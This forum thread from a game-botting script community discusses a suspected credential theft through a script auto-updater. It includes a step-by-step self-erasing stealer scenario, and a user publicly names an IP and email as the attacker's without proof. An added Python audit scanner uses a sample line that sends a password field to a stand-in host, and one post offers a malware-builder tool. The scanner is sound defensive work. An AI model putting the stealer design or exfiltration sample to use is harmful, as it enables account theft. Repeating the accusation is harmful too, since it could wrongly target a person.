
Thread: My friend and I were hacked

  1. #1
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default My friend and I were hacked

    A little background information: I've been using Scar/SRL/Simba since 2006 making my own scripts, and profiting greatly from them. Recently I've been busy with pre-med courses and haven't had time to create my own 2007 scripts so instead I've used some other player-made scripts. Of course this turned out badly for me, and my account was hacked by one of the scripts on this website. I know this for a FACT because the only account I use SIMBA scripts on was hacked while the other one with 100M+ wasn't touched. Thankfully he only took a few mill, and didn't get my almost maxed pure defence. I've looked through the scripts and my only thought is that through an auto updating script he updated it to a version which steals your pass then quickly updated it to a different version so it would be hard to be detected.

    I was able to get his IP address and his email address:

    IP: 101.171.85.55
    Email: pinpinpin@live.com

    Just a friendly warning for all of you, and some encouragement to create your own scripts because they will always be MUCH safer.

  2. #2
    Join Date
    Sep 2010
    Posts
    5,762
    Mentioned
    136 Post(s)
    Quoted
    2739 Post(s)

    Default

    NOPE because thousands of people download and the script is open source and somebody would have noticed by now. Also, it gives you a firewall warning if you have security.sex enabled so this should have never happened.

    Sorry about your loss though.

  3. #3
    Join Date
    Sep 2012
    Location
    Here.
    Posts
    2,007
    Mentioned
    88 Post(s)
    Quoted
    1014 Post(s)

  4. #4
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Officer Barbrady View Post
    NOPE because thousands of people download and the script is open source and somebody would have noticed by now. Also, it gives you a firewall warning if you have security.sex enabled so this should have never happened.

    Sorry about your loss though.
    That would be my issue, I didn't have security.sex enabled and I don't see how it wouldn't be possible to have a script auto-update by downloading from a pastebin, rewriting with new source that steals pass, have that run, then redownload a newer version later on.

  5. #5
    Join Date
    Jan 2012
    Posts
    1,596
    Mentioned
    78 Post(s)
    Quoted
    826 Post(s)

    Default

    Quote Originally Posted by Kevin View Post
    How did you get this person's e-mail address?
    I'm wondering the same thing too...

  6. #6
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Kevin View Post
    How did you get this person's e-mail address?
    I obtained it because they used my password to get into the email of my account (because they were the same/it was a throw away email), and then set that email as an alternate recovery email to that hotmail/live account.

    Let me post my screenshot on my phone in which the request to change was sent to.

    Screenshot_2013-05-21-14-19-14.jpg

  7. #7
    Join Date
    Sep 2010
    Posts
    5,762
    Mentioned
    136 Post(s)
    Quoted
    2739 Post(s)

    Default

    So if it's a throwaway email it's probably also a "throw away IP"

    AKA vps or what ever.

  8. #8
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Officer Barbrady View Post
    So if it's a throwaway email it's probably also a "throw away IP"

    AKA vps or what ever.
    No, my account was a throw away email because I only use it for RS. Digging further I found that "pinpinpin@live.com" is tied to an account called "Pinzork" on another popular site (found it through searching his email on google).

    Anyways, I'm just posting this as a warning/reminder, and I know 100% it was a script on here. I'll be digging through ALL the sources on my computer when I get home and if I find something I'll post it. Anyways, I've had a great 7 years on this website, and it is my favorite community so no hard feelings whatsoever. Thanks for taking your time to read.

  9. #9
    Join Date
    Sep 2012
    Location
    Here.
    Posts
    2,007
    Mentioned
    88 Post(s)
    Quoted
    1014 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    That would be my issue, I didn't have security.sex enabled and I don't see how it wouldn't be possible to have a script auto-update by downloading from a pastebin, rewriting with new source that steals pass, have that run, then redownload a newer version later on.
    A script can't make another script run, so something else would have to be the issue. As opposed to uploading just the username/password protection, is anything uploading the script in its entirety? Just do a ctrl+f on AppPath and paste all cases where it's mentioned.

  10. #10
    Join Date
    Jun 2012
    Posts
    4,867
    Mentioned
    74 Post(s)
    Quoted
    1663 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    No, my account was a throw away email because I only use it for RS. Digging further I found that "pinpinpin@live.com" is tied to an account called "Pinzork" on another popular site (found it through searching his email on google).

    Anyways, I'm just posting this as a warning/reminder, and I know 100% it was a script on here. I'll be digging through ALL the sources on my computer when I get home and if I find something I'll post it. Anyways, I've had a great 7 years on this website, and it is my favorite community so no hard feelings whatsoever. Thanks for taking your time to read.
    Please remember to remove your username & pass if you post a script that you found something in (sounds dumb but I never thought I'd do it either )

  11. #11
    Join Date
    Jun 2012
    Location
    Howell, Michigan
    Posts
    1,585
    Mentioned
    34 Post(s)
    Quoted
    553 Post(s)

    Default

    Yeah, remember to remove it, I've done it too

    Also have you purchased any scripts on Sythe? I'm a seller on the site and could easily get someone to give me a review copy of the script you purchased to look over it etc.

    Anything on our site has been downloaded 100+ times, you wouldn't be the first person to notice, sorry for the loss.

  12. #12
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Kevin View Post
    A script can't make another script run, so something else would have to be the issue. As opposed to uploading just the username/password protection, is anything uploading the script in its entirety? Just do a ctrl+f on AppPath and paste all cases where it's mentioned.
    Okay, I just got home from the hospital and I'm searching through my scripts/my friend scripts now.


    Quote Originally Posted by BMWxi View Post
    Please remember to remove your username & pass if you post a script that you found something in (sounds dumb but I never thought I'd do it either )
    I haven't posted any of my scripts or reposted others that I've used. I double checked that I didn't send my friend my password either.

    Quote Originally Posted by King View Post
    Yeah, remember to remove it, I've done it too

    Also have you purchased any scripts on Sythe? I'm a seller on the site and could easily get someone to give me a review copy of the script you purchased to look over it etc.

    Anything on our site has been downloaded 100+ times, you wouldn't be the first person to notice, sorry for the loss.
    I don't purchase scripts because there is no need to.


    What if someone did the following (assuming security is off or you've allowed the script):
    - Created a script with an auto-updater that downloads a new version of the script
    - You run the current version of the script
    - Script updates, downloads a new version with something that steals your pass
    - You run this so called new version/insert your details to the newly downloaded version
    - When that script^ is run it claims that it isn't the newest version and then sends your pass in & downloads the newest version/Rewritefile without the stealer so it isn't apparent that the stealer is there anymore.

    Also, was anyone curious enough to check that IP/email versus accounts registered here?
    Last edited by eddieh20us; 05-21-2013 at 11:37 PM.

  13. #13
    Join Date
    Jun 2012
    Posts
    4,867
    Mentioned
    74 Post(s)
    Quoted
    1663 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    Okay, I just got home from the hospital and I'm searching through my scripts/my friend scripts now.




    I haven't posted any of my scripts or reposted others that I've used. I double checked that I didn't send my friend my password either.



    I don't purchase scripts because there is no need to.


    What if someone did the following (assuming security is off or you've allowed the script):
    - Created a script with an auto-updater that downloads a new version of the script
    - You run the current version of the script
    - Script updates, downloads a new version with something that steals your pass
    - You run this so called new version/insert your details to the newly downloaded version
    - When that script^ is run it claims that it isn't the newest version and then sends your pass in & downloads the newest version/Rewritefile without the stealer so it isn't apparent that the stealer is there anymore.

    Also, was anyone curious enough to check that IP/email versus accounts registered here?
    Afaik that's possible, although all the autoupdaters I've seen leave the original file intact.

    As for the IP check, maybe @Justin could take a look?

  14. #14
    Join Date
    Dec 2011
    Location
    Hyrule
    Posts
    8,662
    Mentioned
    179 Post(s)
    Quoted
    1870 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    Okay, I just got home from the hospital and I'm searching through my scripts/my friend scripts now.




    I haven't posted any of my scripts or reposted others that I've used. I double checked that I didn't send my friend my password either.



    I don't purchase scripts because there is no need to.


    What if someone did the following (assuming security is off or you've allowed the script):
    - Created a script with an auto-updater that downloads a new version of the script
    - You run the current version of the script
    - Script updates, downloads a new version with something that steals your pass
    - You run this so called new version/insert your details to the newly downloaded version
    - When that script^ is run it claims that it isn't the newest version and then sends your pass in & downloads the newest version/Rewritefile without the stealer so it isn't apparent that the stealer is there anymore.

    Also, was anyone curious enough to check that IP/email versus accounts registered here?
    Depends on where the script auto updates from. If it is from googlecode or github or the like it will have a version history on there. Which scripts are you saying did this?

  15. #15
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Ashaman88 View Post
    Depends on where the script auto updates from. If it is from googlecode or github or the like it will have a version history on there. Which scripts are you saying did this?
    I'd assume github. Heck, I could program exactly what I said in a half hour at most which is the scary thing.

    I've used the following scripts on that account:
    - ElfyyyPC
    - FightcaveCurser
    - GrahahamFisher
    - Practically all the other fight cavers

    What function could be used to upload a file or strings (if possible)? I can grep all the simba scripts to see if any of them have it. The thing is if they did Rewritefile their "hack" code would have been removed when I updated the script the second attempt.


    Anyway, I've already got the money back plus more. I'm just letting you all know that it's certainly possible for someone to do that AND get away with it. The system isn't fool proof, and I certainly was a fool for trusting the updated version to be safe AND allowing exceptions in the security.
    Last edited by eddieh20us; 05-21-2013 at 11:55 PM.
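
The audit asked about in the post above (searching scripts for upload and file-rewrite calls), combined with a before/after hash check for the silent-rewrite scenario from post #12, as an added Python example that is not from the thread or from the Simba/SRL project. `AppPath` and `RewriteFile` are named in the thread; the other function names and the `.Pass`/`.Pin` credential fields are assumptions about Simba/SRL, and the sample script is constructed.

```python
import hashlib
import re
from pathlib import Path

# Calls worth reviewing by hand. AppPath and RewriteFile come from the thread;
# the other names are Simba/SCAR built-ins assumed here, not a complete list.
CATEGORIES = {
    "network": r"\b(GetPage|GetHTTPPage|PostHTTPPage(Ex)?|AddPostVariable)\b",
    "file_write": r"\b(RewriteFile|WriteFileString|CreateFile)\b",
    "own_path": r"\b(AppPath|ScriptPath)\b",
    # Assumed SRL-style credential fields such as Players[0].Pass
    "credential": r"\.\s*(Pass|Pin)\b",
}
RULES = {name: re.compile(rx, re.IGNORECASE) for name, rx in CATEGORIES.items()}


def scan_source(text):
    """Return {category: [(line_no, line), ...]} for one script's source."""
    # Comments are not stripped, so commented-out calls are flagged too;
    # for an audit, over-reporting is the safer failure.
    hits = {name: [] for name in RULES}
    for no, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits[name].append((no, line.strip()))
    return hits


def verdicts(hits):
    """Combine raw hits into the two behaviours discussed in the thread."""
    out = []
    if hits["network"] and hits["file_write"]:
        out.append("can-rewrite-itself")  # download + write = updater
    cred_lines = {no for no, _ in hits["credential"]}
    if any(no in cred_lines for no, _ in hits["network"]):
        out.append("credential-in-network-call")
    return out


def manifest(folder):
    """SHA-256 of every .simba file, to diff before and after a run."""
    return {p.name: hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(Path(folder).glob("*.simba"))}


def changed(before, after):
    """Names of scripts added, removed or modified between two manifests."""
    return sorted(n for n in before.keys() | after.keys()
                  if before.get(n) != after.get(n))


# Constructed sample: an updater that also sends a credential field.
SAMPLE = """program Demo;
var f: Integer;
begin
  f := RewriteFile(ScriptPath + 'Demo.simba', False);
  WriteFileString(f, GetPage('http://example.invalid/latest.txt'));
  CloseFile(f);
  GetPage('http://example.invalid/v?p=' + Players[0].Pass);
end.
"""

if __name__ == "__main__":
    print(verdicts(scan_source(SAMPLE)))
```

A credential copied into a local variable before the network call escapes the same-line rule, so every `network` hit still needs reading by hand; the manifest diff catches a rewrite even when the final file is clean.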

  16. #16
    Join Date
    Mar 2007
    Posts
    5,125
    Mentioned
    275 Post(s)
    Quoted
    901 Post(s)

    Default


    Forum account issues? Please send me a PM

  17. #17
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by Justin View Post
    Thanks for checking Justin. They most likely used a VPS or proxy. You all can lock this thread if you like since I don't have any proof of an exact script that this could have occurred with. I just wanted to point out the possible security flaw that could affect people who are too lazy to check every updated script that they get.

  18. #18
    Join Date
    Mar 2012
    Location
    127.0.0.1
    Posts
    3,383
    Mentioned
    95 Post(s)
    Quoted
    717 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    Thanks for checking Justin. They most likely used a VPS or proxy. You all can lock this thread if you like since I don't have any proof of an exact script that this could have occurred with. I just wanted to point out the possible security flaw that could affect people who are too lazy to check every updated script that they get.
    Do you play private servers?

  19. #19
    Join Date
    Sep 2006
    Posts
    27
    Mentioned
    0 Post(s)
    Quoted
    13 Post(s)

    Default

    Quote Originally Posted by NKN View Post
    Do you play private servers?
    Not for 2-3 years, and they were only servers that I was co-owner on.

    I know I wasn't keylogged because my emails, bank accounts, other RS accounts, and what not weren't touched. While this one specific account that I use simba was. Heck, they didn't even access my EOC account with 10B+ on it with all 99s.

  20. #20
    Join Date
    Mar 2012
    Location
    127.0.0.1
    Posts
    3,383
    Mentioned
    95 Post(s)
    Quoted
    717 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    Not for 2-3 years, and they were only servers that I was co-owner on.

    I know I wasn't keylogged because my emails, bank accounts, other RS accounts, and what not weren't touched. While this one specific account that I use simba was. Heck, they didn't even access my EOC account with 10B+ on it with all 99s.
    Have you run Malwarebytes or w/e it is?

  21. #21
    Join Date
    Jun 2012
    Location
    Howell, Michigan
    Posts
    1,585
    Mentioned
    34 Post(s)
    Quoted
    553 Post(s)

    Default

    If the script did that, just redownload it and then run the auto updater, then check instead of running it? Am I really the only one here who smells the bandwagon effect lately on hackings...I mean I've seen an influx, but seriously, I bet I could find another source of the hacking within 20 minutes of touching your computer. In computers there is no such thing as knowing for a fact. Unless you know every file on your computer, where it came from etc. You have no way of saying, I know for a "fact" it was nothing but a simba script.

    I really do appreciate that you are not like "samba haxorzed mi acctz bro" but I am fairly certain I could find the actual suspect in under half an hour. Why? Well I learned how to make them and crypt them and use them on HF, I thought what the heck, why not? I've been hacked before ( completely my fault Btw ) and figured I would learn how they did it.

    My point is, if the scripts you used were open source, it wasn't Simba, end of story. The probability alone kills that idea. However it could easily have been an accidental visit to a website, could have been sleeping from the old Java exploit, I mean you are telling me you are god on Internet security? I run malware bits, avg, avast, spyware bot etc. on a daily basis at night to clean my computer and can still end up having to hand quarantine a virus.

    If you would like, PM me and I will send you a link to download a program on HF used to create malware, it also contains a "cure" which will kill anything that you may have downloaded on accident, or even just picked up at a website. The main idea behind the "cure" is to test the created virus, logger or w/e you made on your computer, then the "cure" fixes your computer. It will work even when the malware is crypted.

    I'm not ripping on you, you were open and kind about it ( amazing to see<3 and I appreciate it ) but I am tired of reading the hacking threads, it wasn't an OPEN source simba script on our site, private scripts I can't tell you as it depends on the scripter, how trustworthy they are, where they are from etc.

    So, I will be more than happy to send anybody the link who wants it, also anybody claiming "that will just hack me" I will just be sending a link, I can send it to a mod as well. I just don't think I'm allowed to post a link to something that creates malware.

    So cheers all, and at OP I'm glad you have the bank back(:
    Last edited by King; 05-22-2013 at 03:05 AM.

  22. #22
    Join Date
    Dec 2011
    Location
    Hyrule
    Posts
    8,662
    Mentioned
    179 Post(s)
    Quoted
    1870 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    I'd assume github. Heck, I could program exactly what I said in a half hour at most which is the scary thing.

    I've used the following scripts on that account:
    - ElfyyyPC
    - FightcaveCurser
    - GrahahamFisher
    - Practically all the other fight cavers

    What function could be used to upload a file or strings (if possible)? I can grep all the simba scripts to see if any of them have it. The thing is if they did Rewritefile their "hack" code would have been removed when I updated the script the second attempt.


    Anyway, I've already got the money back plus more. I'm just letting you all know that it's certainly possible for someone to do that AND get away with it. The system isn't fool proof, and I certainly was a fool for trusting the updated version to be safe AND allowing exceptions in the security.
    Go see what those scripts use. If it is github like you said, github shows the revision history so you can see if there have been any malicious updates.

  23. #23
    Join Date
    Jun 2012
    Posts
    4,867
    Mentioned
    74 Post(s)
    Quoted
    1663 Post(s)

    Default

    I'd like to say that the open source argument only really works when people read the code. Of course, with the high volume of people we have here there is a high chance that someone who knows what they're doing has read the code, but that's not certain. I know personally I ran ShatterFighter without reading through all of it. Do I think it has anything bad in it? No. Do I know? No, because I haven't read all of it. However, I trust ShatterHand, and I also am comforted by the fact that the source is open to read should anyone wish to. Oh and before people start saying things, the reason I chose that script as an example was because it is a script that I didn't write that I've used in the past, used recently, and plan to use again.

    TLDR; If you don't trust a script, read through the code yourself or don't use it.

  24. #24
    Join Date
    Jul 2012
    Posts
    437
    Mentioned
    10 Post(s)
    Quoted
    165 Post(s)

    Default

    Quote Originally Posted by Kevin View Post
    A script can't make another script run, so something else would have to be the issue. As opposed to uploading just the username/password protection, is anything uploading the script in its entirety? Just do a ctrl+f on AppPath and paste all cases where it's mentioned.
    Pretty sure it's not hard to do.
    *removed*('C:\...\***.exe');// you just need to create the .exe file that launches and runs a script

  25. #25
    Join Date
    Mar 2006
    Location
    Belgium
    Posts
    3,564
    Mentioned
    111 Post(s)
    Quoted
    1475 Post(s)

    Default

    Quote Originally Posted by eddieh20us View Post
    Not for 2-3 years, and they were only servers that I was co-owner on.

    I know I wasn't keylogged because my emails, bank accounts, other RS accounts, and what not weren't touched. While this one specific account that I use simba was. Heck, they didn't even access my EOC account with 10B+ on it with all 99s.
    Did you guys use paste.villavu.com by any chance? Some people forget to remove their passwords there.
    I saw it happen on a few occasions

    Creds to DannyRS for this wonderful sig!
